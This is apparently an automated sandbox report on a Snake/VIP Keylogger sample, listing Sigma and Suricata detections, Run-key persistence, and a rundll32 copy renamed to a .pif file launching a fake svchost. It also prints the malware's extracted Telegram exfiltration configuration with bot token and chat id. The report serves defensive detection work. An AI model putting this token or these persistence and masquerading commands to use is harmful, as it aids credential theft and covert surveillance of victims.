Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\fpnevlzQ.pif, CommandLine: C:\Users\Public\Libraries\fpnevlzQ.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\fpnevlzQ.pif, NewProcessName: C:\Users\Public\Libraries\fpnevlzQ.pif, OriginalFileName: C:\Users\Public\Libraries\fpnevlzQ.pif, ParentCommandLine: "C:\Users\user\Desktop\PWSW6GK3ZC.exe", ParentImage: C:\Users\user\Desktop\PWSW6GK3ZC.exe, ParentProcessId: 5852, ParentProcessName: PWSW6GK3ZC.exe, ProcessCommandLine: C:\Users\Public\Libraries\fpnevlzQ.pif, ProcessId: 7100, ProcessName: fpnevlzQ.pif

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Qzlvenpf.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PWSW6GK3ZC.exe, ProcessId: 5852, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qzlvenpf

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 132.226.8.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\fpnevlzQ.pif, Initiated: true, ProcessId: 7100, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Qzlvenpf.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PWSW6GK3ZC.exe, ProcessId: 5852, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qzlvenpf

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\fpnevlzQ.pif, CommandLine: C:\Users\Public\Libraries\fpnevlzQ.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\fpnevlzQ.pif, NewProcessName: C:\Users\Public\Libraries\fpnevlzQ.pif, OriginalFileName: C:\Users\Public\Libraries\fpnevlzQ.pif, ParentCommandLine: "C:\Users\user\Desktop\PWSW6GK3ZC.exe", ParentImage: C:\Users\user\Desktop\PWSW6GK3ZC.exe, ParentProcessId: 5852, ParentProcessName: PWSW6GK3ZC.exe, ProcessCommandLine: C:\Users\Public\Libraries\fpnevlzQ.pif, ProcessId: 7100, ProcessName: fpnevlzQ.pif

Sigma detected: Potentially Suspicious Rundll32 Activity

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , CommandLine: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , CommandLine|base64offset|contains: , Image: C:\Users\Public\ndpha.pif, NewProcessName: C:\Users\Public\ndpha.pif, OriginalFileName: C:\Users\Public\ndpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\\Qzlvenpf13.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2504, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , ProcessId: 4196, ProcessName: ndpha.pif

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-22T08:08:34.142404+0100	2803305	3	Unknown Traffic	192.168.2.5	49706	104.21.96.1	443	TCP
2025-02-22T08:08:39.058841+0100	2803305	3	Unknown Traffic	192.168.2.5	49731	104.21.96.1	443	TCP
2025-02-22T08:08:40.542190+0100	2803305	3	Unknown Traffic	192.168.2.5	49743	104.21.96.1	443	TCP
2025-02-22T08:08:41.954182+0100	2803305	3	Unknown Traffic	192.168.2.5	49756	104.21.96.1	443	TCP
2025-02-22T08:08:42.920334+0100	2803305	3	Unknown Traffic	192.168.2.5	49765	104.21.96.1	443	TCP
2025-02-22T08:08:44.409484+0100	2803305	3	Unknown Traffic	192.168.2.5	49777	104.21.96.1	443	TCP
2025-02-22T08:08:49.191721+0100	2803305	3	Unknown Traffic	192.168.2.5	49811	104.21.96.1	443	TCP
2025-02-22T08:08:50.599146+0100	2803305	3	Unknown Traffic	192.168.2.5	49822	104.21.96.1	443	TCP
2025-02-22T08:08:52.093479+0100	2803305	3	Unknown Traffic	192.168.2.5	49836	104.21.96.1	443	TCP
2025-02-22T08:08:53.523783+0100	2803305	3	Unknown Traffic	192.168.2.5	49850	104.21.96.1	443	TCP
2025-02-22T08:08:57.799616+0100	2803305	3	Unknown Traffic	192.168.2.5	49884	104.21.96.1	443	TCP
2025-02-22T08:08:59.236612+0100	2803305	3	Unknown Traffic	192.168.2.5	49896	104.21.96.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-22T08:08:31.110780+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	132.226.8.169	80	TCP
2025-02-22T08:08:33.571146+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	132.226.8.169	80	TCP
2025-02-22T08:08:34.993026+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49707	132.226.8.169	80	TCP
2025-02-22T08:08:36.720666+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49715	132.226.8.169	80	TCP
2025-02-22T08:08:38.202692+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49727	132.226.8.169	80	TCP
2025-02-22T08:08:39.944029+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49735	132.226.8.169	80	TCP
2025-02-22T08:08:40.928409+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49740	132.226.8.169	80	TCP
2025-02-22T08:08:41.561527+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49748	132.226.8.169	80	TCP
2025-02-22T08:08:42.350265+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49740	132.226.8.169	80	TCP
2025-02-22T08:08:43.772139+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49771	132.226.8.169	80	TCP
2025-02-22T08:08:45.345951+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49783	132.226.8.169	80	TCP
2025-02-22T08:08:49.969905+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49812	132.226.8.169	80	TCP
2025-02-22T08:08:51.547992+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49812	132.226.8.169	80	TCP
2025-02-22T08:08:52.954248+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49843	132.226.8.169	80	TCP
2025-02-22T08:08:54.376163+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49853	132.226.8.169	80	TCP
2025-02-22T08:08:55.845051+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49866	132.226.8.169	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-22T08:08:47.177157+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49798	149.154.167.220	443	TCP
2025-02-22T08:08:54.415391+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49854	149.154.167.220	443	TCP
2025-02-22T08:09:02.966397+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49924	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PWSW6GK3ZC.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\Public\Libraries\Qzlvenpf.PIF

Avira: detection malicious, Label: HEUR/AGEN.1326052

Found malware configuration

Source: 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7741549877:AAGvFhZZl3oxTcYaKtJFu52Jb5_V7o5wbi0", "Chat id": "1224745150"}
Source: 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7741549877:AAGvFhZZl3oxTcYaKtJFu52Jb5_V7o5wbi0", "Chat_id": "1224745150", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	ReversingLabs: Detection: 68%
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Virustotal: Detection: 66%	Perma Link
Source: C:\Windows \SysWOW64\NETUTILS.dll	ReversingLabs: Detection: 70%
Source: C:\Windows \SysWOW64\NETUTILS.dll	Virustotal: Detection: 61%	Perma Link

Multi AV Scanner detection for submitted file

Source: PWSW6GK3ZC.exe	Virustotal: Detection: 66%			Perma Link
Source: PWSW6GK3ZC.exe	ReversingLabs: Detection: 68%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.1% probability

Sample uses string decryption to hide its real strings

Source: 7.2.fpnevlzQ.pif.2de602c6.2.unpack	String decryptor: 7741549877:AAGvFhZZl3oxTcYaKtJFu52Jb5_V7o5wbi0
Source: 7.2.fpnevlzQ.pif.2de602c6.2.unpack	String decryptor: 1224745150
Source: 7.2.fpnevlzQ.pif.2de602c6.2.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Unpacked PE file: 7.2.fpnevlzQ.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Unpacked PE file: 10.2.fpnevlzQ.pif.400000.1.unpack
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Unpacked PE file: 13.2.fpnevlzQ.pif.400000.1.unpack

Source: PWSW6GK3ZC.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49757 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49827 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49924 version: TLS 1.2

Source:	Binary string: System.Windows.Forms.pdb source: fpnevlzQ.pif, 0000000D.00000002.3391955107.0000000022B10000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: fpnevlzQ.pif, 0000000D.00000002.3391955107.0000000022B10000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: PWSW6GK3ZC.exe, 00000000.00000002.2135728965.00000000206E1000.00000004.00001000.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000003.2101000543.000000007F110000.00000004.00001000.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000002.2135728965.00000000206CE000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.0.dr
Source:	Binary string: _.pdb source: fpnevlzQ.pif, 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: ndpha.pif, ndpha.pif, 00000008.00000000.2151389693.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, ndpha.pif.6.dr
Source:	Binary string: rundll32.pdbGCTL source: ndpha.pif, 00000008.00000000.2151389693.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, ndpha.pif.6.dr
Source:	Binary string: easinvoker.pdbGCTL source: PWSW6GK3ZC.exe, 00000000.00000002.2135728965.00000000206E1000.00000004.00001000.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000003.2112236025.0000000000703000.00000004.00000020.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000003.2101000543.000000007F110000.00000004.00001000.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000003.2112236025.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000002.2135728965.00000000206CE000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.0.dr

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

Code function: 0_2_028A534C GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_028A534C

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2DD4F9C0h	7_2_2DD4F820
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 2DD4F9C0h	7_2_2DD4FA0F
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DAD09Ch	7_2_31DACDF0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DA3326h	7_2_31DA2F08
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DA2D5Ch	7_2_31DA2AA8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DAFC0Ch	7_2_31DAF960
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DAF7B4h	7_2_31DAF508
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DAF35Ch	7_2_31DAF0B0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DAEF04h	7_2_31DAEC58
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_31DA0856
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_31DA0040
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DAEAACh	7_2_31DAE800
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DAE654h	7_2_31DAE3A8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DAE1FCh	7_2_31DADF50
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DA3326h	7_2_31DA2F03
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DA0D10h	7_2_31DA0B30
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DA16FBh	7_2_31DA0B30
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DADDA4h	7_2_31DADAF8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DAD94Ch	7_2_31DAD6A0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DA3326h	7_2_31DA3254
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31DAD4F4h	7_2_31DAD248
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_31DA0676
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9144Ch	7_2_31F911A0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F93B64h	7_2_31F938B8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F996F3h	7_2_31F99420
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F98320h	7_2_31F97FE0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9D629h	7_2_31F9D358
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F918A4h	7_2_31F915F8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9E889h	7_2_31F9E5B8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9C861h	7_2_31F9C590
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F90FF4h	7_2_31F90D48
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then mov esp, ebp	7_2_31F9B529
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9E3F1h	7_2_31F9E120
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9C3C9h	7_2_31F9C0F8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F90B9Ch	7_2_31F908F0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F96B96h	7_2_31F968E8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F90744h	7_2_31F90498
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9673Ch	7_2_31F96490
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9DF59h	7_2_31F9DC88
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9BF31h	7_2_31F9BC60
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9370Ch	7_2_31F93460
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F902ECh	7_2_31F90040
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F962E4h	7_2_31F96038
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9FAE9h	7_2_31F9F818
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F932B4h	7_2_31F93008
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9DAC1h	7_2_31F9D7F0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F95E8Ch	7_2_31F95BE0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9BA99h	7_2_31F9B7C8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F92E5Ch	7_2_31F92BB0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F97E34h	7_2_31F97B88
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F95A34h	7_2_31F95788
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9F651h	7_2_31F9F380
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F92A04h	7_2_31F92758
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F955DCh	7_2_31F95330
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F979DCh	7_2_31F97730
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F925ACh	7_2_31F92300
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9F1B9h	7_2_31F9EEE8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F97584h	7_2_31F972D8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F95184h	7_2_31F94ED8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9D191h	7_2_31F9CEC0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F92154h	7_2_31F91EA8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F94D2Ch	7_2_31F94A80
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9712Ch	7_2_31F96E80
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9ED21h	7_2_31F9EA50
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F91CFCh	7_2_31F91A50
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 31F9CCF9h	7_2_31F9CA28
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32006882h	7_2_32006510
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200737Bh	7_2_32007080
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32006EB3h	7_2_32006BB8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200BFFBh	7_2_3200BD00
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 320010D9h	7_2_32000E08
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200EB03h	7_2_3200E808
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32007D0Bh	7_2_32007A10
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200A813h	7_2_3200A518
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 320050EAh	7_2_32004E18
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 320039F1h	7_2_32003720
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200D31Bh	7_2_3200D020
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200902Bh	7_2_32008D30
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32001A09h	7_2_32001738
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200BB33h	7_2_3200B838
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32000311h	7_2_32000040
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200E63Bh	7_2_3200E340
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32007843h	7_2_32007548
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32005A19h	7_2_32005748
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200A34Bh	7_2_3200A050
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32004321h	7_2_32004050
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200CE53h	7_2_3200CB58
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32002C29h	7_2_32002958
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200F95Bh	7_2_3200F660
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32008B63h	7_2_32008868
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32002312h	7_2_32002068
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32000C41h	7_2_32000970
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200B66Bh	7_2_3200B370
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200E173h	7_2_3200DE78
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32006349h	7_2_32006078
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32004C51h	7_2_32004980
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32009E83h	7_2_32009B88
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32003559h	7_2_32003288
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200C98Bh	7_2_3200C690
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200F493h	7_2_3200F198
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200869Bh	7_2_320083A0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32001571h	7_2_320012A0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200B1A3h	7_2_3200AEA8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32005581h	7_2_320052B0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200DCABh	7_2_3200D9B0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32003E89h	7_2_32003BB8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 320099BBh	7_2_320096C0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32002791h	7_2_320024C0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200C4C3h	7_2_3200C1C8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32001EA1h	7_2_32001BD0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200EFCBh	7_2_3200ECD0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 320081D3h	7_2_32007ED8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 320007A9h	7_2_320004D8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200ACDBh	7_2_3200A9E0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32005EB1h	7_2_32005BE0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 320047B9h	7_2_320044E8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3200D7E3h	7_2_3200D4E8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 320030C1h	7_2_32002DF0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 320094F3h	7_2_320091F8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32032983h	7_2_32032688
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32031FF3h	7_2_32031CF8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32031B2Bh	7_2_32031830
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 3203033Bh	7_2_32030040
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32031194h	7_2_32030E98
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32030803h	7_2_32030508
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32031663h	7_2_32031368
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 320324BBh	7_2_320321C0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then jmp 32030CCBh	7_2_320309D0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_321B51F0
